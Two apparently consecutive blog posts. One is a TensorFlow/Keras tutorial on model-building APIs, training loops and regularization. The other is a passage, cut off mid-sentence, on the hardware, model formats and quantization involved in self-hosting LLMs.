To physically prove the VRAM parameter explosion ($O(n^2)$) discussed earlier, we will feed a flat 1-megapixel image (1,000,000 pixels) into a dense network and ask TensorFlow to calculate the parameter count.

import tensorflow as tf
from tensorflow.keras import layers, models

# 1. Instantiate the linear stack
model = models.Sequential()

# 2. Add layers sequentially
# Input: A flat 1-megapixel image (1,000,000 pixels)
model.add(layers.Input(shape=(1000000,)))

# Hidden Layer 1: 1,000 neurons
model.add(layers.Dense(1000, activation='relu'))

# Hidden Layer 2: 512 neurons
model.add(layers.Dense(512, activation='relu'))

# Output Layer: 10 classes
model.add(layers.Dense(10, activation='softmax'))

# 3. Print the hardware reality
model.summary()

When you execute model.summary(), the framework prints the exact size of the weight matrices it must allocate in VRAM. The output for this simple 3-layer network looks like this:

Model: "sequential"
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
dense (Dense)                (None, 1000)              1000001000
dense_1 (Dense)              (None, 512)               512512
dense_2 (Dense)              (None, 10)                5130
=================================================================
Total params: 1,000,518,642
Trainable params: 1,000,518,642
Non-trainable params: 0
_________________________________________________________________

Look at the Param # for the very first hidden layer. Because Dense layers require every input to connect to every neuron, the GPU must allocate exactly 1,000,001,000 parameters ($1,000,000 \text{ inputs} \times 1,000 \text{ weights} + 1,000 \text{ biases}$) just for that single mathematical step.
If you attempt to compile and train this model locally, the framework will immediately throw an Out of Memory error because the physical weight matrices exceed standard VRAM capacities.
The Limitation The Sequential API strictly assumes one input tensor, one output tensor, and a perfectly linear cascade of math. You cannot build complex, modern architectures with it. If your data requires branching, merging, or routing an activation tensor around a layer (skip connections), the Sequential API physically cannot map the computational graph.
3. Keras Functional API Focus While the Sequential API is easy, it is useless for modern production models. The Keras Functional API abandons the linear list constraint and treats layers strictly as mathematical functions. This allows you to explicitly map the exact flow of the tensors, enabling complex architectures like branching, merging, and multiple inputs or outputs.
Graph Topology Instead of adding layers to a list, you define a standalone Input tensor that explicitly dictates the physical shape of the incoming data. You then physically pass this tensor into a layer, and that layer returns a new, transformed tensor. You manually chain these functions together to build a Directed Acyclic Graph (DAG) of matrix operations.
import tensorflow as tf
from tensorflow.keras import layers, Model

# 1. Explicitly define the input tensor
inputs = layers.Input(shape=(256, 256, 3))

# 2. Treat layers as mathematical functions that take a tensor and return a tensor
x = layers.Conv2D(32, kernel_size=(3, 3), activation='relu')(inputs)
x = layers.MaxPooling2D(pool_size=(2, 2))(x)
x = layers.Flatten()(x)

# 3. Define the final mathematical output
outputs = layers.Dense(10, activation='softmax')(x)

# 4. Instantiate the graph by defining its strict input/output boundaries
model = Model(inputs=inputs, outputs=outputs)

Branching and Merging (Multiple Inputs) In the real world, data is multimodal. You might have a model that needs to predict house prices using both a flat CSV of numeric features (square footage, age) and a 2D image tensor (a photo of the house).
The Functional API allows you to build completely independent parallel branches of math and physically merge them together deeper in the network.

# Branch A: Numeric Data (e.g., 10 features)
numeric_input = layers.Input(shape=(10,), name="numeric_data")
x = layers.Dense(64, activation='relu')(numeric_input)

# Branch B: Image Data (e.g., 128x128 RGB)
image_input = layers.Input(shape=(128, 128, 3), name="image_data")
y = layers.Conv2D(32, (3, 3), activation='relu')(image_input)
y = layers.Flatten()(y)

# Merge: Concatenate the two feature representations into a single tensor
combined = layers.concatenate([x, y])

# Final Output based on the merged tensor
outputs = layers.Dense(1, activation='linear')(combined)

# Build the multi-input model
model = Model(inputs=[numeric_input, image_input], outputs=outputs)

Skip Connections The most powerful physical "lever" the Functional API provides is the ability to route data around bottlenecks. As discussed in Phase 4, deep networks suffer from vanishing gradients. The ResNet architecture solved this by introducing the "skip connection" (or residual connection).
Instead of forcing a tensor to pass exclusively through Layer B, you split the tensor. One path goes through Layer B to undergo mathematical transformation, while the other path physically bypasses Layer B entirely. You then use element-wise addition to merge the raw, untransformed tensor back into the processed tensor.
This creates an uninterrupted mathematical highway for the backward pass, allowing gradients to flow deep into the network without degrading.

inputs = layers.Input(shape=(64,))

# The primary tensor flow
x = layers.Dense(64, activation='relu')(inputs)

# Save the raw activation state to a separate variable
residual = x

# Pass the tensor through a deep, potentially destructive bottleneck
x = layers.Dense(64, activation='relu')(x)
x = layers.Dense(64, activation='relu')(x)

# Skip Connection: Add the raw residual tensor back into the degraded tensor
x = layers.add([x, residual])

outputs = layers.Dense(10, activation='softmax')(x)
model = Model(inputs=inputs, outputs=outputs)

4. Model Subclassing (Object-Oriented Architecture) Focus The Functional API constructs a Directed Acyclic Graph (DAG). It is incredibly powerful, but it is entirely static. Once the model is compiled, the physical path the tensors will take through the VRAM is permanently locked.
If you need a network that dynamically reconfigures its architecture on the fly based on the specific data it is processing at that exact millisecond, static graphs fail.
Model Subclassing drops the functional graph entirely. It allows you to build fully custom, object-oriented architectures where the forward pass is evaluated dynamically at runtime using standard Python control flow.
The Mechanics of Object-Oriented Math To build a subclassed model, you write a custom Python class that inherits directly from tf.keras.Model. This forces you to explicitly separate the physical allocation of VRAM from the mathematical execution of the tensors.
You must define two core methods:
__init__ (The Constructor): This is the allocation phase. You physically instantiate all the required weight matrices (the layers) here so the framework knows to track their parameters for gradient calculation. You are not passing data through them yet; you are just claiming the memory. call (The Execution Engine): This is where you manually define the exact mathematical forward pass. Because this method executes at runtime for every batch, you can use standard Python if/else statements, for loops, and dynamic tensor routing. The Levers (Dynamic Computational Graphs) Why would you go through the trouble of writing object-oriented models instead of just chaining functions? Dynamic routing.
Imagine you are building a system that processes network traffic packets. Most packets are simple and benign, but a small percentage are highly complex and potentially malicious. If you use a static Functional API model, every single packet, even the simple ones, must be forced through the deepest, most computationally expensive layers of your network, wasting massive amounts of GPU time.
With Model Subclassing, you can write conditional logic directly into the silicon's execution path.
In the call method, you can instruct the GPU to mathematically evaluate the variance of the incoming tensor. If the variance is low, route it through a fast, shallow "classifier" block and exit immediately. Else (if the variance is high), route the tensor into a massive, 50-layer deep bottleneck for intense scrutiny.
Here is the exact code demonstrating this dynamic architectural lever:
import tensorflow as tf
from tensorflow.keras import layers, Model

class DynamicRouterModel(Model):
    def __init__(self, **kwargs):
        super(DynamicRouterModel, self).__init__(**kwargs)
        # 1. VRAM Allocation Phase: Instantiate the individual layers
        # The framework tracks these to calculate gradients later
        self.entry_dense = layers.Dense(64, activation='relu')
        # Fast path for simple data
        self.shallow_classifier = layers.Dense(10, activation='softmax')
        # Heavy path for complex data
        self.deep_bottleneck_1 = layers.Dense(256, activation='relu')
        self.deep_bottleneck_2 = layers.Dense(256, activation='relu')
        self.heavy_classifier = layers.Dense(10, activation='softmax')

    def call(self, inputs, training=False):
        # 2. Execution Phase: This runs dynamically for every batch
        x = self.entry_dense(inputs)
        # Calculate the mathematical variance of the batch tensor
        tensor_variance = tf.math.reduce_variance(x)
        # The Lever: Dynamic Conditional Routing
        # If variance is low, use the computationally cheap path
        if tensor_variance < 0.5:
            return self.shallow_classifier(x)
        # Else, force the tensor through the heavy compute blocks
        else:
            x = self.deep_bottleneck_1(x)
            x = self.deep_bottleneck_2(x)
            return self.heavy_classifier(x)

# Instantiate and build the model
model = DynamicRouterModel()
# The architecture is not physically locked until the first batch of data is pushed through it
dummy_data = tf.random.normal((32, 100))
output = model(dummy_data)

Notice that the architecture is not locked until data actually hits the call method. The network physically alters its computational depth batch-by-batch. This level of total mathematical control is strictly impossible in the Sequential or Functional APIs.
5. Custom Training Loops (Manual Calculus) Focus The Sequential, Functional, and Subclassed APIs all generally rely on a single command to execute the training process: model.fit(). Calling this method hands total control of the hardware and the math over to TensorFlow's high-level C++ backend. It abstracts away the forward pass, the loss calculation, backpropagation, and the optimizer step into a black box.
If you need bare-metal access to the calculus engine, you must ditch .fit() entirely and write a Custom Training Loop. This translates the exact theoretical mechanics we covered in Phase 3 directly into Python.
The Gradient Tape To manually execute the backward pass, you have to explicitly tell the GPU when to start tracking operations and hoarding activations in VRAM. TensorFlow handles this physical caching using a context manager called tf.GradientTape().
When you open a Gradient Tape block, the framework actively monitors every single mathematical operation executed on a tensor. It builds the computational graph in real-time, caching the intermediate $A$ and $Z$ matrices (as discussed in Phase 3) specifically so it can calculate the local derivatives later. The exact millisecond you exit the with block, the forward pass is complete, and the tape is primed for the chain rule.
Executing the Math Once the forward pass is recorded and the final Total Loss scalar is calculated, you must explicitly command the tape to execute backpropagation.
You call tape.gradient(loss, model.trainable_weights). This single line of code is the physical manifestation of the chain rule. The hardware cascades backward through the cached VRAM states, calculating the exact partial derivative ($\nabla L$) for every single parameter matrix in the network.
Finally, you hand those calculated gradient vectors to the optimizer engine to physically alter the weights using optimizer.apply_gradients().
The Levers (Bare-Metal Control) Here is the exact code for a single, manual step of a custom training loop.
import tensorflow as tf

# Assume 'model' is an instantiated architecture, 'optimizer' is Adam,
# and 'loss_fn' is Cross-Entropy.

# 1. Isolate a single batch of tensors
def train_step(images, labels):
    # 2. Open the physical VRAM cache
    with tf.GradientTape() as tape:
        # 3. The Forward Pass (activations are now actively cached)
        predictions = model(images, training=True)
        # 4. Calculate the Total Loss scalar for this specific batch
        loss = loss_fn(labels, predictions)

    # --- We have now exited the tape. The forward pass is locked. ---

    # 5. Backpropagation: Command the tape to execute the chain rule
    # This yields a list of gradient matrices perfectly matching the shape of the weight matrices
    gradients = tape.gradient(loss, model.trainable_weights)

    # 6. The Optimizer Engine: Physically alter the VRAM weights
    # We pair each calculated gradient with its corresponding weight matrix
    optimizer.apply_gradients(zip(gradients, model.trainable_weights))
    return loss

Why write this instead of just calling .fit()? Because it exposes every single mathematical lever in the pipeline.
If you are researching a highly specific architecture, you might not want the optimizer to update all weights equally. Inside a custom loop, you can intercept the gradients list before it hits the optimizer. You can mathematically clip the gradients, multiply specific layer gradients by a penalty scalar, or even inject custom noise directly into the backward pass vectors to force the model out of local minima. It grants you absolute, unrestricted control over the optimization physics.
Troubleshooting and Refinement 1. The Bias-Variance Tradeoff Executing the calculus of backpropagation without crashing the GPU does not mean the model is successful; it just means the math compiled. The default state of a deep neural network is failure. A neural network must navigate the constant mathematical tension between learning too little and learning too much. We diagnose this strictly by observing the divergence of the training and validation loss curves over the course of the training loop.
Underfitting (High Bias) The physical reality: The model lacks the architectural capacity to map the complexity of the data manifold. It physically does not possess enough parameters, deep enough layers, or sufficient non-linear activation functions to twist its decision boundary around the data. It is mathematically rigid. The metric: When plotting the loss, the curve plateaus early. Both the training loss and the validation loss remain unacceptably high. The optimizer is physically incapable of driving the error down, regardless of how many epochs you force the GPU to compute. Overfitting (High Variance) The physical reality: The model has too much capacity. Instead of being forced to learn the underlying, generalized pattern, the GPU possesses enough parameter matrices to mathematically memorize the exact noise, anomalies, and statistical quirks of the specific training batches. The metric: The training loss drops perfectly and continuously toward zero. However, the validation loss hits a hard floor and then rapidly begins to climb. The model is becoming flawlessly accurate on the training data while catastrophically failing on unseen data. The divergence of these two lines is the exact moment the model stops learning and starts memorizing.
The Sweet Spot The entire goal of a training run is not to achieve zero error. It is finding the "sweet spot": the exact epoch where the validation loss curve reaches its absolute mathematical minimum before the variance takes over. Once that validation line begins to tick upward, any further GPU computation is actively destroying the model's ability to generalize to reality.
2. Regularization Techniques Overfitting is the default state of a high-capacity network.
If you give a deep network enough parameters and enough time, it will always choose the mathematically lazy route of memorizing the training data instead of learning the complex, underlying rules. Regularization is the practice of actively sabotaging the network during the training loop to mathematically force it to generalize to unseen reality.
Dropout Layers (Network Sabotage) The most common structural regularization technique is the Dropout layer.
During every single forward pass of the training loop, a Dropout layer physically disables a random percentage (typically 20% to 50%) of the neurons in the preceding layer. It does this by multiplying their activation tensors by exactly zero.
This mathematically prevents "co-adaptation." If neurons are constantly dropping offline, the network can no longer rely on one specific, highly tuned pathway to generate a prediction. It is physically forced to distribute its feature representations redundantly across the entire weight matrix. When evaluating the test set, dropout is turned off, and the resulting fully-active architecture is vastly more robust.
Weight Decay Weight decay alters the fundamental calculus of the optimizer by modifying the loss function itself. Instead of just calculating the error of the prediction, the framework adds a mathematical penalty strictly based on the raw physical size of the weight matrices.
L2 Regularization (Ridge): This adds a penalty proportional to the squared magnitude of the weights. The updated loss function looks like this: $$L_{total} = L_{error} + \lambda \sum w^2$$ This mathematically forces all weights to remain extremely small. If a single weight grows too large, the squared penalty explodes, generating a massive gradient that forces the optimizer to shrink it back down. It prevents any single feature from dominating the network's logic. L1 Regularization (Lasso): This adds a penalty proportional to the absolute magnitude of the weights: $$L_{total} = L_{error} + \lambda \sum |w|$$ Unlike L2, which just shrinks weights, L1 violently forces non-critical weights to exactly zero. This creates a "sparse" matrix that mathematically ignores useless input features, effectively acting as an automated feature-selection mechanism. Early Stopping The simplest and most effective hardware intervention does not involve altering the architecture or the loss function; it simply cuts off the compute.
Early Stopping is a callback script that actively monitors the validation loss at the end of every epoch. The exact epoch where the validation loss stops dropping and begins to rise is the moment the model transitions from learning to memorizing. The script immediately halts the training loop, cuts off the GPU to save compute time, and physically reverts the VRAM back to the saved weights of that optimal, minimum-loss epoch.
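Wired together in Keras, the three levers above look roughly like this; the layer sizes, dropout rate, and penalty value are illustrative, and the training data is assumed to exist elsewhere:

import tensorflow as tf
from tensorflow.keras import layers, models, regularizers, callbacks

model = models.Sequential([
    layers.Input(shape=(100,)),
    # L2 weight decay: penalize large weights directly in the loss
    layers.Dense(128, activation='relu', kernel_regularizer=regularizers.l2(1e-4)),
    # Dropout: randomly zero out 30% of the activations, during training only
    layers.Dropout(0.3),
    layers.Dense(10, activation='softmax'),
])

model.compile(optimizer='adam', loss='sparse_categorical_crossentropy')

# Early Stopping: halt when validation loss stops improving and restore the best weights
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=3, restore_best_weights=True)

# Training call, assuming x_train / y_train and a validation split exist:
# model.fit(x_train, y_train, validation_data=(x_val, y_val),
#           epochs=100, callbacks=[early_stop])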
3. Hyperparameter Tuning Backpropagation and the optimizer automatically update the millions of weights inside the network. However, human engineers must define the macroscopic rules governing that optimization process: the learning rate ($\alpha$), the batch size, the percentage of neurons dropped, and the physical count of layers and nodes. These are hyperparameters.
Because you cannot calculate a direct mathematical gradient to optimize a hyperparameter, finding the optimal architecture often devolves into guessing. To find the mathematical optimum scientifically, we must programmatically search the parameter space.
Grid Search Grid Search is the most naive approach to hyperparameter tuning. You define a rigid, discrete matrix of possible values (e.g., learning rates of 0.01, 0.001, and 0.0001; batch sizes of 32, 64, and 128) and force the hardware to train a completely new model from scratch for every single combination.
The physical bottleneck is that Grid Search scales combinatorially. Testing just 5 learning rates, 5 batch sizes, and 5 dropout rates requires executing 125 distinct training loops. If one loop takes 4 hours, the search takes roughly 20 days. More critically, if a learning rate of 0.01 is mathematically doomed to explode the gradients on your specific dataset, Grid Search will blindly waste massive GPU cycles re-evaluating that exact same doomed learning rate across every single batch size variation.
Random Search Random Search abandons the rigid matrix. Instead of defining discrete steps, you define continuous bounds (e.g., any learning rate between 0.0001 and 0.1) and allow the script to randomly sample combinations.
Statistically, Random Search is vastly superior to Grid Search. In deep learning, certain hyperparameters (like learning rate) have a massive impact on the loss, while others (like an exact dropout percentage) have a minor impact. By randomly sampling, the algorithm physically explores a much wider, more continuous variety of values for the critical variables, rather than getting locked into evaluating redundant combinations. It reliably discovers higher-performing models in a fraction of the total compute time.
Bayesian Optimization Both Grid and Random search are "dumb" algorithms; they do not learn from their past failures. If a combination yields a catastrophic loss, they simply move to the next iteration without adjusting their strategy.
Bayesian Optimization treats the hyperparameter search as a machine learning problem itself. It builds a probabilistic surrogate model (typically a Gaussian Process) to map the hyperparameter space.
Here is how the mechanics work:
The script trains 3 to 5 initial models using random hyperparameter combinations. It evaluates their final validation loss metrics and feeds those numbers into the surrogate model. The surrogate model mathematically predicts which specific, untested combination of hyperparameters is most likely to yield a lower validation loss. The script trains the next model using only that highly probable combination, evaluates the result, and updates the surrogate model's mathematical understanding of the space. Instead of guessing, the script actively guides the search away from doomed parameter spaces, intelligently hunting for the optimal setup and saving days or weeks of wasted hardware execution time.
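As a sketch of what "programmatically searching the space" means in practice, here is a bare-bones random search loop. The build_and_train function is a hypothetical helper that trains a model with the sampled hyperparameters and returns its validation loss:

import random

def random_search(build_and_train, n_trials=20):
    best = {"val_loss": float("inf"), "params": None}
    for _ in range(n_trials):
        # Sample from continuous/discrete bounds rather than a rigid grid
        params = {
            "learning_rate": 10 ** random.uniform(-4, -1),   # log-uniform between 1e-4 and 1e-1
            "batch_size": random.choice([32, 64, 128, 256]),
            "dropout": random.uniform(0.1, 0.5),
        }
        val_loss = build_and_train(**params)   # one full training run for this combination
        if val_loss < best["val_loss"]:
            best = {"val_loss": val_loss, "params": params}
    return best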
Summary This was a low-level, under-the-hood explanation of training with Deep Learning. I want to build on this by working with TensorFlow more, taking the low-level ideas and implementing them in different projects, but I have to play with it a little more first so that I know what I am doing.

Overview I have been looking into self-hosting LLMs, and this is my attempt to put everything I've learned about the subject in one place (so I can stop forgetting things). Alongside that, I wanted to include information about the setup I use to self-host LLMs on my laptop and the steps I took to build and optimize it. That will come in the future, as there are still some things I am changing and this is long enough already, so I moved some of those parts to the next section.
The end result of this project for me is a setup that integrates cloud AI with local LLMs to help with reverse engineering, coding, and general troubleshooting. This post's goal is to inform you about much of what's going on under the hood if you want to self-host LLMs and build workflows around them.
Background When it comes to self-hosting LLMs, for the most part, you could just download Ollama, install the models, and call it a day, but there are lots of moving pieces to consider if you want to go beyond that. The first thing to consider when self-hosting LLMs is which models you want to run, so you can build the best setup for them. To understand some of the things I am talking about in the model section, which will be towards the end, we need to talk about hardware.
Hardware There are three main things to consider when looking at hardware for running LLMs: the size of the model that can run, prefill speed, and inference speed. In general, memory determines the size and therefore the smartness of the model you can physically run; memory bandwidth, combined with compute power, determines how fast the LLM that you run will be at both prefill and inference.
NOTE: I am going to use chip as a generic term for CPU or GPU, as what I am talking about applies to both.
Memory Bandwidth This is an important stat when evaluating hardware for running LLMs, given how models actually run on computers. You have the model's weights, which need to be moved from memory to the chip. This means that, to compute one step of the process, a weight has to move from memory into the processor, be computed, and then be moved back out for the next iteration. The bottleneck can be either computing power or bandwidth. This also starts becoming an issue when talking about clustering machines together. To increase memory bandwidth, you can either widen the "road" (bus width/channels), increase the speed of traffic (frequency/transfer rate), or shorten the distance data travels (integration/stacking).
Widening the road means adding more wires to transfer data between the two devices. More wires mean more parallel processing because there are more roads for traffic.
But when you increase the number of channels, you also need to add more unified memory controllers (UMCs) on the chip to keep up with the new channels.
The second option is to increase traffic speed. This essentially reduces the time between electrical signals on each line. To accomplish this, you need better signal integrity, along with chipsets directly in memory to help control voltage and sync timing, such as Power Management Integrated Circuits (PMICs) and Clock Drivers (CKDs). These help ensure that the data is not degraded when signals are sent closer together in time. Another thing that can increase the "speed limit" is changing the data encoding used across the wire. Two things are happening here: line encoding and signal density. I am not going to get into line encoding here, but essentially the important part is reducing overhead, meaning sending more data with less packaging. Signal density is increasing the amount of data sent at every clock cycle across one channel by not using just 1s and 0s, but instead using multiple voltage levels, effectively sending more data in one electrical signal.
The third thing you can do to increase memory bandwidth is to shorten the road (much more complicated than you think). The reasoning comes down to two things: one, a shorter wire means less distance to travel and therefore faster trip times; and two, the longer the wire, the more it acts like a capacitor, meaning lower frequencies for sending data because it takes longer for electrical signals to leave the wire. To accomplish this in hardware, newer chips essentially stack the memory vertically so it doesn't have to sit flat on the board. That is called High Bandwidth Memory (HBM), which requires Through-Silicon Vias (TSVs) to connect the layers together. Modern chips are really multiple chiplets connected together on a package. The package substrate, like a motherboard, is made of fiberglass, which doesn't allow for the tiny connections needed to stack memory in HBM. So there is a piece of silicon called the interposer that sits between the chiplets and the substrate, allowing for the stacking of memory. That process is called Chip-on-Wafer-on-Substrate (CoWoS). The next step to make the path shorter is to combine the CPU and GPU memory, called unified memory (Mac uses this). This reduces the distance not only between the CPU or GPU and its memory, but also between the CPU and GPU. The step after that is building the CPU or GPU cores into the memory itself, with the memory scattered throughout, putting memory and processing power right next to each other (this is not happening yet).
So to sum it up, memory bandwidth is determined by the number of channels between the memory and the chip, how quickly data can transfer over those channels, and how short those channels are. Memory bandwidth, in most cases, is the bottleneck for inference (writing speed).
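A back-of-the-envelope way to see why: during generation, every new token has to stream (roughly) the entire set of weights through the chip once, so token rate is capped by bandwidth divided by model size. The numbers below are illustrative, not benchmarks:

# Rough upper bound: each generated token reads ~all of the weights once,
# so generation speed is capped by bandwidth / model size.
def max_tokens_per_second(bandwidth_gb_s, model_size_gb):
    return bandwidth_gb_s / model_size_gb

# Illustrative numbers: a ~7B model quantized to 4-bit is roughly 4 GB of weights
print(max_tokens_per_second(bandwidth_gb_s=100, model_size_gb=4))    # ~25 tok/s (laptop-class memory)
print(max_tokens_per_second(bandwidth_gb_s=1000, model_size_gb=4))   # ~250 tok/s (HBM-class memory)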
Compute Power Another factor to consider is how powerful the chip is at computing matrix multiplication (MatMul). One of the reasons the CPU is worse for these operations compared to a GPU is that a CPU is built of a couple of very complex cores that can handle lots of different things one at a time super fast, while a GPU is built of lots of specialized cores that are slower but, due to architecture, can compute simultaneously while also being smaller. Inside the GPU, there are several different types of cores for performing different tasks. When it comes to MatMul, the tensor core is the specialist. Every time you send a prompt, the GPU must multiply your input against billions of parameters, meaning billions of MatMuls.
The tensor core is much faster at MatMuls because it can perform the entire operation in a single cycle, whereas other cores would need to break it down into multiple steps. This process, called Matrix Multiply-Accumulate (MMA), computes the equation D = A × B + C, which is the math required when running models. There are also multiple sizes of tensor cores for different data sizes, i.e., different model weight precisions.
Besides the tensor cores themselves, another hardware feature is used to run LLMs faster. Sparsity, as discussed in the model section, requires hardware that can skip the zeroed-out operations the model has baked in when working with fine-grained structured sparsity. This hardware can be called sparse tensor cores.
The CPU also plays a role in running the model, even if it isn't doing the heavy lifting. The CPU is responsible for fetching data from memory into the GPU's vRAM. If you have a fast enough CPU, you can also run models that don't fully fit in vRAM by running some calculations on the CPU. In MoE models, the CPU determines the routing for assigning weights to the GPU. Additionally, the CPU is what tokenizes your input and de-tokenizes the output (at least part of the process). The CPU is also in charge of managing the KV cache.
When it comes to computing power, the GPU is the workhorse that can plow through billions of MatMuls quickly, but the CPU still needs to be powerful enough to feed the GPU with data and handle other management tasks when running LLMs. There are also many tricks with models for improving performance that the hardware needs to be built to take advantage of.
Memory Really, this section comes down to speed again. When using GPUs, the fast memory is called vRAM, so how much vRAM you have determines how large a model you can fit on your computer without seeing massive drop-offs in speed. This is due to slower memory bandwidth when communicating between the CPU and the GPU. This is one of the reasons that Apple's unified memory is so good at running LLMs: you have access to more memory that has high memory bandwidth to the GPUs. When talking about how large a model you can run, it comes down to how much memory you have with high-bandwidth access to the fast compute cores. This, in most cases, comes down to vRAM or Apple Silicon's unified memory architecture.
NOTE: You can split a model between vRAM and normal memory in some special cases to fit larger models. That process is called sharding.
Landscape of Hardware This is only important if you are considering buying hardware to run LLMs; otherwise, you are just working with what you have, which is why I am not going deep into this topic. There are really four options for running your own LLMs with hardware:
GPU builds in a PC (RTX 5090s)
Prebuilt desktops designed for AI (NVIDIA Spark)
Apple Silicon
Renting much more powerful hardware in a datacenter
Unified Memory is what Apple uses in their chips. Essentially, the memory is accessible to both the CPU and the GPU simultaneously, meaning two things primarily: you can fit much larger models than with traditional GPUs, and you can do some special computational acceleration.
Models When we talk about running an LLM, we are effectively running a static file containing a snapshot of intelligence. Unlike traditional software, which is logic-based, a model is probabilistic.
It doesn't "know" anything in the traditional sense; instead, it predicts the next piece of information based on the patterns it learned during training.
Anatomy of a Model To understand why these files are so large and require such massive bandwidth to run, we need to break down the physical composition of a Large Language Model. When you download a model, whether it is a 70B parameter Llama 3 or a 671B DeepSeek, you are essentially downloading a massive, serialized dictionary of matrices (tensors) and a configuration file that tells the inference engine how to stitch them together.
At the lowest level, the "file size" on your disk is dominated by the Weights (or parameters). When we say a model has "70 Billion Parameters," we mean it contains 70 billion individual floating-point numbers that represent the strength of connections between neurons. In a standard unquantized FP16 model, each parameter is a 16-bit floating-point number taking up 2 bytes of memory, meaning a 70B model requires roughly 140 GB of vRAM just to load. These weights are grouped into multi-dimensional arrays called tensors; for example, a single layer might have a weight tensor of size [8192, 8192]. To run the model, your GPU must move these massive tensors from VRAM into the compute cores to perform matrix multiplication against your input, which is why memory bandwidth is the primary bottleneck for inference speed.
If the weights are the fuel, the Architecture is the engine block. Almost all modern LLMs utilize the Transformer architecture, which consists of a stack of identical blocks repeated dozens of times; a 70B model might have 80 of these layers. Inside each layer are Attention Heads and Feed-Forward Networks (FFN). The Attention Heads allow the model to understand context by comparing the current token to every previous token in your prompt, while the FFN is a massive dense network where the "knowledge" is processed. In dense models, every token passes through the entire FFN, whereas Mixture of Experts (MoE) models break this FFN into smaller "experts" to save compute. These layers are interspersed with Normalization (e.g., RMSNorm) to keep the numerical values stable as they propagate deeper into the network.
While not part of the downloaded file, the KV Cache (Key-Value Cache) is a critical component of the model's runtime architecture. When you feed a prompt into the model, it calculates the attention values for those tokens once and stores them in VRAM so it doesn't have to recalculate them for the next word. This cache grows linearly with your context length. If you have a massive 128k context window, this "temporary" memory can easily consume more VRAM than the model weights themselves, often causing Out of Memory (OOM) errors even if the model initially loads fine.
Finally, the Tokenizer acts as the interface between you and the weights. Models cannot read English; they only understand numbers. The tokenizer breaks your text into chunks called "tokens," which can be words, parts of words, or spaces, and assigns each one a unique ID number based on a fixed vocabulary (e.g., 128,000 unique tokens).
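As a quick illustration, using the Hugging Face transformers library and GPT-2's tokenizer purely because it is small and public (any tokenizer behaves the same way, just with a different vocabulary):

from transformers import AutoTokenizer

# GPT-2's tokenizer is used here only as an example
tok = AutoTokenizer.from_pretrained("gpt2")

ids = tok.encode("Self-hosting LLMs is mostly a memory problem.")
print(ids)                              # a list of integer token IDs
print(tok.convert_ids_to_tokens(ids))   # the text chunks those IDs map back to
print(tok.vocab_size)                   # size of the fixed vocabulary (50257 for GPT-2)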
A more efficient tokenizer can represent complex words in fewer tokens, effectively increasing your context window and generation speed.
Model File Types The extension on the file you download dictates how the inference engine interacts with these weights. Safetensors (.safetensors) is the industry-standard "raw" format, developed by HuggingFace to replace the insecure Python "Pickle" files. It is designed for speed using "memory mapping," which allows the operating system to point the model directly to the file on the hard drive without first copying the data into RAM. This structure, a header describing the data followed by a massive byte-stream of raw numbers, makes loading massive models nearly instant on fast storage.
For self-hosting on consumer hardware, specifically via llama.cpp, you will use GGUF (.gguf). Unlike Safetensors, which often requires separate configuration files, GGUF is a binary format that packs the weights, architecture definition, quantization tables, and tokenizer into a single executable-ready file. It is specifically optimized for Apple Silicon and CPU inference, utilizing block-based quantization tables that allow the hardware to decode compressed weights on the fly with minimal overhead.
AWQ / GPTQ: These are specialized formats optimized for running quantized models on NVIDIA GPUs. They pack the weights so they align perfectly with the GPU's memory layout for faster access.
Quantization If weights and architecture are the anatomy of the model, Quantization is the compression algorithm that makes them portable. It is arguably the single most important concept for self-hosting because it is the only reason we can run 70B-parameter models on consumer hardware rather than requiring $30,000 enterprise-grade cards.
At a high level, quantization is the process of reducing the precision of the numbers used to represent the model's parameters. Most models are trained in FP16 (16-bit Floating Point) or BF16 (Brain Float 16). In this format, every single weight requires 16 bits (2 bytes) of memory. This offers incredible precision, allowing for tiny nuances in the values, but it is computationally expensive and memory-hungry. Quantization takes that high-precision range and maps it to a lower-precision grid, typically INT8 (8-bit integer) or INT4 (4-bit integer).
Think of this like resizing a high-resolution raw image into a JPEG. You are technically throwing away data (pixel-perfect color accuracy is lost), but if done correctly, the human eye (or in this case, the model's reasoning capability) can't tell the difference. The "magic" of modern quantization is that neural networks are surprisingly resilient to this noise. You can often reduce the information by 75% (from 16-bit to 4-bit) while losing less than 1% of the model's intelligence.
The Mechanics of Precision To understand how this works, you have to look at how the numbers are stored. In a standard 4-bit quantization, we restrict the model to only 16 possible values (since 4 bits can only represent 0-15) to approximate the infinite range of a floating-point number.
We achieve this using a Scale Factor and a Zero Point.
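A tiny NumPy sketch of what a scale factor and zero point actually do, done per-tensor here for clarity (real formats compute these per block of 32 or 128 weights):

import numpy as np

def quantize_int4(w):
    """Map float weights onto the 16 integer levels a 4-bit value can hold."""
    qmin, qmax = 0, 15
    scale = (w.max() - w.min()) / (qmax - qmin)        # how much "real value" one integer step covers
    zero_point = int(round(-w.min() / scale))          # which integer maps back to 0.0
    q = np.clip(np.round(w / scale) + zero_point, qmin, qmax).astype(np.uint8)
    return q, scale, zero_point

def dequantize(q, scale, zero_point):
    """Unpack the integers back into approximate floats at compute time."""
    return (q.astype(np.float32) - zero_point) * scale

w = np.random.randn(8).astype(np.float32)
q, scale, zp = quantize_int4(w)
print(w)
print(dequantize(q, scale, zp))   # close to w, but snapped onto a 16-level grid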
Instead of storing the actual weight value, we store a tiny integer and a separate scaling constant that tells the GPU how to \u0026ldquo;unpack\u0026rdquo; that integer back into a jagged approximation of the original number during calculation. This is why you will often see \u0026ldquo;groups\u0026rdquo; or \u0026ldquo;blocks\u0026rdquo; mentioned in quantization settings (e.g., group size 128). The model doesn\u0026rsquo;t just squash the entire 70B parameter set with a single scale factor; it splits the weights into small blocks (usually 32 or 128 weights) and computes a separate scale for each block. This localized precision allows the model to handle sensitive layers with high variance without degrading the rest of the network.\nSmart Quantization: K-Quants and Importance Not all parameters in a model are created equal. Some weights are \u0026ldquo;load-bearing\u0026rdquo;—they are critical for the model\u0026rsquo;s logic and syntax—while others are effectively noise. If you aggressively quantize the important weights, the model becomes lobotomized (perplexity increases). If you leave the useless weights at high precision, you are wasting vRAM.\nThis is where modern formats like GGUF and its K-Quants (K-series) come into play. When you see a file labeled Q4_K_M, it isn\u0026rsquo;t just a flat 4-bit truncation. It uses a smart, mixed-precision approach called superblocking. The \u0026ldquo;K\u0026rdquo; refers to the specific quantization algorithm (often k-means clustering) that optimizes the assignment of these quantization levels. In a Q4_K_M model, the attention mechanisms (the most sensitive part of the brain) might be kept at 6-bit precision, while the feed-forward layers (the bulk storage) are dropped to 3-bit or 